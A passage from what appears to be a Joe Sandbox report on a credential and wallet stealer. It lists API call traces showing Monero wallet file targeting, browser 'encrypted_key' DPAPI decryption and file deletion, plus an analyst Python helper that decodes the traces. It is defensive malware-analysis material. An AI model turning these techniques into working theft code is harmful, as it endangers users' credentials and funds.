                  • RegOpenKeyExA.ADVAPI32(80000002,0104B7A0,00000000,00020119,?), ref: 00937E5E
                  • RegQueryValueExA.ADVAPI32(?,0105DC58,00000000,00000000,000000FF,000000FF), ref: 00937E7F
                  • RegCloseKey.ADVAPI32(?), ref: 00937E92
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: ef5406816b39ec16972be18dc065391ef7a3c923aa961bb2bec79cbe1fe31897
                  • Instruction ID: f38bf3adaf3e63a7fb529d791b351650bd0a8752852454138187ae5a37f4049a
                  • Opcode Fuzzy Hash: ef5406816b39ec16972be18dc065391ef7a3c923aa961bb2bec79cbe1fe31897
                  • Instruction Fuzzy Hash: 50113AB1A44205ABDB20CBD4DD49FBBBBB8EB44B10F104159F605A72D0DBB869008FA2
                  APIs
                  • StrStrA.SHLWAPI(0105E018,?,?,?,0093140C,?,0105E018,00000000), ref: 0093926C
                  • lstrcpyn.KERNEL32(00B6AB88,0105E018,0105E018,?,0093140C,?,0105E018), ref: 00939290
                  • lstrlen.KERNEL32(?,?,0093140C,?,0105E018), ref: 009392A7
                  • wsprintfA.USER32 ref: 009392C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: f89f1a69e916c5b7308b1d2a229c011e614e631c666ae0c0edef7f5a1d346b70
                  • Instruction ID: 521ac179b40bd89931835aac9147176f71b2650b57ce874dea552c462c01cac2
                  • Opcode Fuzzy Hash: f89f1a69e916c5b7308b1d2a229c011e614e631c666ae0c0edef7f5a1d346b70
                  • Instruction Fuzzy Hash: BC01CC75500108FFCB04DFECC994EAE7BB9EB48354F148548F909AB244CA75AE40DF91
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009212B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009212BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009212D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009212F5
                  • RegCloseKey.ADVAPI32(?), ref: 009212FF
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 05b20f7e70f90828f204407a3af30867c58e98ae236b1579497d9cb85ae054c5
                  • Instruction ID: 02a36a9a8980f23137638453859db967fe6e5bda61b2bdcf3cc415377f3af5fe
                  • Opcode Fuzzy Hash: 05b20f7e70f90828f204407a3af30867c58e98ae236b1579497d9cb85ae054c5
                  • Instruction Fuzzy Hash: 9E01E6B5A40208BBDB14DFD4DC59FAEB7BCEB48701F108155FA15A72C0DAB5AA018F51
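The three registry readers at 009340F4, 00937E5E and 009212D7 share one detail worth decoding: every RegOpenKeyExA passes samDesired 0x00020119, which is KEY_READ (0x20019) with KEY_WOW64_64KEY (0x100). The first opens HKEY_CURRENT_USER (0x80000001), the second HKEY_LOCAL_MACHINE (0x80000002), and the third a handle the plugin could not resolve; since the image is 32-bit (SysWOW64 PowerShell path, 60-byte SHELLEXECUTEINFOA), the WOW64 flag makes the process read the native 64-bit view instead of the WOW6432Node redirection, so the values it collects are the ones a 64-bit application would see. The helper below is an added analyst aid written for this report, not part of Joe Sandbox or the sample: it parses API-call lines in the format these entries use and decodes the hive, the access mask and the CSIDL passed to SHGetFolderPathA (0x1C is CSIDL_LOCAL_APPDATA in the path-building function at 00938E0B). The embedded lines are copied from this report; the constant tables are standard Windows SDK values.

```python
import re

# Sample input constructed from API-call lines printed in this report's entries.
SAMPLE_LINES = [
    "RegOpenKeyExA.ADVAPI32(80000001,0105D9D8,00000000,00020119,?), ref: 009340F4",
    "RegOpenKeyExA.ADVAPI32(80000002,0104B7A0,00000000,00020119,?), ref: 00937E5E",
    "RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009212D7",
    "SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B",
    "wsprintfA.USER32 ref: 009392C7",  # no argument list: the plugin shows none for it
]

# Predefined hive handles (winreg.h).
HIVES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}

KEY_READ = 0x20019  # STANDARD_RIGHTS_READ | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY
KEY_BITS = [
    (0x0001, "KEY_QUERY_VALUE"), (0x0002, "KEY_SET_VALUE"),
    (0x0004, "KEY_CREATE_SUB_KEY"), (0x0008, "KEY_ENUMERATE_SUB_KEYS"),
    (0x0010, "KEY_NOTIFY"), (0x0020, "KEY_CREATE_LINK"),
    (0x0100, "KEY_WOW64_64KEY"), (0x0200, "KEY_WOW64_32KEY"),
    (0x20000, "STANDARD_RIGHTS_READ"),
]

# Folder identifiers (shlobj.h) commonly used when building stealer target paths.
CSIDL = {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA", 0x28: "CSIDL_PROFILE"}

CALL_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$"
)


def parse_call(line):
    """Split one 'Api.MODULE(arg,...), ref: ADDR' line into its parts.

    '?' (unknown to the plugin) becomes None, hex words become ints and any
    other token (an inlined string, for example) is kept verbatim. Lines with
    no argument list return None.
    """
    m = CALL_RE.match(line.strip())
    if not m:
        return None
    args = []
    for raw in m.group("args").split(","):
        raw = raw.strip()
        if raw in ("", "?"):
            args.append(None)
            continue
        try:
            args.append(int(raw, 16))
        except ValueError:
            args.append(raw)
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": m.group("ref").upper()}


def decode_access(mask):
    """Name the bits of a RegOpenKeyEx samDesired value, folding KEY_READ first."""
    names = []
    if mask & KEY_READ == KEY_READ:
        names.append("KEY_READ")
        mask &= ~KEY_READ
    names += [name for bit, name in KEY_BITS if mask & bit]
    return names


def annotate(call):
    """One-line analyst note for the call kinds seen in this report, else None."""
    api, args = call["api"], call["args"]
    if api == "RegOpenKeyExA" and len(args) >= 4:
        hive = args[0]
        if hive in HIVES:
            where = HIVES[hive]
        elif hive is None:
            where = "unknown hive"
        else:
            where = f"non-predefined value {hive:#x} (handle resolved at runtime)"
        access = "|".join(decode_access(args[3])) if args[3] is not None else "?"
        return f"{call['ref']}: RegOpenKeyExA on {where}, access {access}"
    if api == "SHGetFolderPathA" and len(args) >= 2 and args[1] is not None:
        folder = CSIDL.get(args[1]) or f"CSIDL {args[1]:#x}"
        return f"{call['ref']}: SHGetFolderPathA for {folder}"
    return None


def triage(lines):
    """Parse every line and collect the notes; lines that do not parse are skipped."""
    notes = []
    for line in lines:
        call = parse_call(line)
        if call is not None:
            note = annotate(call)
            if note:
                notes.append(note)
    return notes


if __name__ == "__main__":
    for note in triage(SAMPLE_LINES):
        print(note)
```

Feeding the whole function list of a report through `triage` gives a quick map of which hives and folders a stealer touches, and the KEY_WOW64_64KEY decode is the kind of detail that explains why a 32-bit sample still finds 64-bit browser or wallet installations.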
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00936663
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00936726
                  • ExitProcess.KERNEL32 ref: 00936755
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: 0791ef7e8745713e66842698ac2caf31723498c6f6c75136431c2581fb51a16d
                  • Instruction ID: d317a476531e07c0681f0aaba46e35f3b5fe75c408789f46d305d322b6535935
                  • Opcode Fuzzy Hash: 0791ef7e8745713e66842698ac2caf31723498c6f6c75136431c2581fb51a16d
                  • Instruction Fuzzy Hash: 0E31FDB1801218AADB14EB50DC95BDE7778AF54300F404199F20A77191DF746B49CF5A
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00940E28,00000000,?), ref: 0093882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00938836
                  • wsprintfA.USER32 ref: 00938850
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: ffeb2c6ac86d6bd37112607f8ac9ab06a6cf139cb669c1f6fcc4657ac3a67608
                  • Instruction ID: eaceb1936da3f50bdd40d27aa3b0415d60cb9880c853e06d497a4ee98d076ca3
                  • Opcode Fuzzy Hash: ffeb2c6ac86d6bd37112607f8ac9ab06a6cf139cb669c1f6fcc4657ac3a67608
                  • Instruction Fuzzy Hash: 6521EAB1A45208ABDB04DF94DD49FAEBBB8FB48711F104119F605B72D0CBB9A9018FA1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0093951E,00000000), ref: 00938D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00938D62
                  • wsprintfW.USER32 ref: 00938D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: 8da0c0615ee3ccbbf9f4716a68baf97097880e4e24dbe80d5d79aa9a1ce3ef29
                  • Instruction ID: 45a93354c558ba52848d375c1b49b972f7ea5ae176ee99d9cb11b88e6b254ba7
                  • Opcode Fuzzy Hash: 8da0c0615ee3ccbbf9f4716a68baf97097880e4e24dbe80d5d79aa9a1ce3ef29
                  • Instruction Fuzzy Hash: 0AE0E675A50208BFDB10DB94DD09E6977B8EB84702F004154FD0A972C0DDB56E109F56
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 00938B60: GetSystemTime.KERNEL32(00940E1A,0105C720,009405AE,?,?,009213F9,?,0000001A,00940E1A,00000000,?,01059110,?,\Monero\wallet.keys,00940E17), ref: 00938B86
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0092A2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 0092A3FF
                  • lstrlen.KERNEL32(00000000), ref: 0092A6BC
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 0092A743
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 0004fb3a439ce0293bcc780a4f7cbead42795d16e82f909f6192d428b7f9ab55
                  • Instruction ID: ec78896cd738047381d24339b067ac5de29d41ad9d76eafc27c60ede0dcef8bb
                  • Opcode Fuzzy Hash: 0004fb3a439ce0293bcc780a4f7cbead42795d16e82f909f6192d428b7f9ab55
                  • Instruction Fuzzy Hash: D0E1BC72810118ABDB05FBA4DC92FEE7338AF94300F508169F557B60A1EF746A49CF66
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 00938B60: GetSystemTime.KERNEL32(00940E1A,0105C720,009405AE,?,?,009213F9,?,0000001A,00940E1A,00000000,?,01059110,?,\Monero\wallet.keys,00940E17), ref: 00938B86
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0092D481
                  • lstrlen.KERNEL32(00000000), ref: 0092D698
                  • lstrlen.KERNEL32(00000000), ref: 0092D6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 0092D72B
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 5f5dae55a77400a6c690f20238af87ffba9193eeaba83dc7701559aae4da2452
                  • Instruction ID: c8c5d1aeb96c01272d5df8869f1ee0b0ed342983dcbf3a67e99e23b545aee232
                  • Opcode Fuzzy Hash: 5f5dae55a77400a6c690f20238af87ffba9193eeaba83dc7701559aae4da2452
                  • Instruction Fuzzy Hash: 0291FD72910108ABDB04FBA4DC96FEE7338AF94300F504168F547B60A1EF746A09CFA6
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 00938B60: GetSystemTime.KERNEL32(00940E1A,0105C720,009405AE,?,?,009213F9,?,0000001A,00940E1A,00000000,?,01059110,?,\Monero\wallet.keys,00940E17), ref: 00938B86
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0092D801
                  • lstrlen.KERNEL32(00000000), ref: 0092D99F
                  • lstrlen.KERNEL32(00000000), ref: 0092D9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 0092DA32
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 9e5fb2c8ddd779ceb05b807c24167186f40ddef938ab2ca346923603b0dc9cd8
                  • Instruction ID: 7ef38f57fe106c0d335945aeeabcb221ee642265cdfe6355e27cba38d0cf9347
                  • Opcode Fuzzy Hash: 9e5fb2c8ddd779ceb05b807c24167186f40ddef938ab2ca346923603b0dc9cd8
                  • Instruction Fuzzy Hash: DC81EB72910108AACF04FBA4DC96FEE7339AF94300F504528F547B60A1EF746A09DFA6
                  APIs
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 009299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009299EC
                    • Part of subcall function 009299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00929A11
                    • Part of subcall function 009299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00929A31
                    • Part of subcall function 009299C0: ReadFile.KERNEL32(000000FF,?,00000000,0092148F,00000000), ref: 00929A5A
                    • Part of subcall function 009299C0: LocalFree.KERNEL32(0092148F), ref: 00929A90
                    • Part of subcall function 009299C0: CloseHandle.KERNEL32(000000FF), ref: 00929A9A
                    • Part of subcall function 00938E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00938E52
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00941580,00940D92), ref: 0092F54C
                  • lstrlen.KERNEL32(00000000), ref: 0092F56B
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                  • String ID: ^userContextId=4294967295$moz-extension+++
                  • API String ID: 998311485-3310892237
                  • Opcode ID: 63d32c0f42a330eb7a11269a74cdde7df768139344a3571458ec7e3461773692
                  • Instruction ID: cc4d18b1a4401d2bc4392ad01ab9a09634a3f3941a6720898c3896951b93860a
                  • Opcode Fuzzy Hash: 63d32c0f42a330eb7a11269a74cdde7df768139344a3571458ec7e3461773692
                  • Instruction Fuzzy Hash: BD51E171D10108AADB04FBB4DC96FED7379AFD4300F408528F956A7191EE346A09CFA6
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: 6a223631c7ddec5bdf2a08e77482eb25e70f74245367340110d89fcdf450dc56
                  • Instruction ID: ad774aca065070f4f10c52fab33a0a8febead7339773644be7b03cd0e7606007
                  • Opcode Fuzzy Hash: 6a223631c7ddec5bdf2a08e77482eb25e70f74245367340110d89fcdf450dc56
                  • Instruction Fuzzy Hash: E041F1B5D10109AFCB04EFA4D896FFEB778AB94304F108418F51677291DB756A05CFA2
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 009299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009299EC
                    • Part of subcall function 009299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00929A11
                    • Part of subcall function 009299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00929A31
                    • Part of subcall function 009299C0: ReadFile.KERNEL32(000000FF,?,00000000,0092148F,00000000), ref: 00929A5A
                    • Part of subcall function 009299C0: LocalFree.KERNEL32(0092148F), ref: 00929A90
                    • Part of subcall function 009299C0: CloseHandle.KERNEL32(000000FF), ref: 00929A9A
                    • Part of subcall function 00938E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00938E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00929D39
                    • Part of subcall function 00929AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00924EEE,00000000,00000000), ref: 00929AEF
                    • Part of subcall function 00929AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00924EEE,00000000,?), ref: 00929B01
                    • Part of subcall function 00929AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00924EEE,00000000,00000000), ref: 00929B2A
                    • Part of subcall function 00929AC0: LocalFree.KERNEL32(?,?,?,?,00924EEE,00000000,?), ref: 00929B3F
                    • Part of subcall function 00929B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00929B84
                    • Part of subcall function 00929B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00929BA3
                    • Part of subcall function 00929B60: LocalFree.KERNEL32(?), ref: 00929BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: 9839f718a494385f8a30ae95beeeb083b592baafc3ed53277c882f1cc9021c47
                  • Instruction ID: 1ba54bb8b4118f9f53a88aed5bc4dac95fd4696b9648d4d093c1adf5c572175c
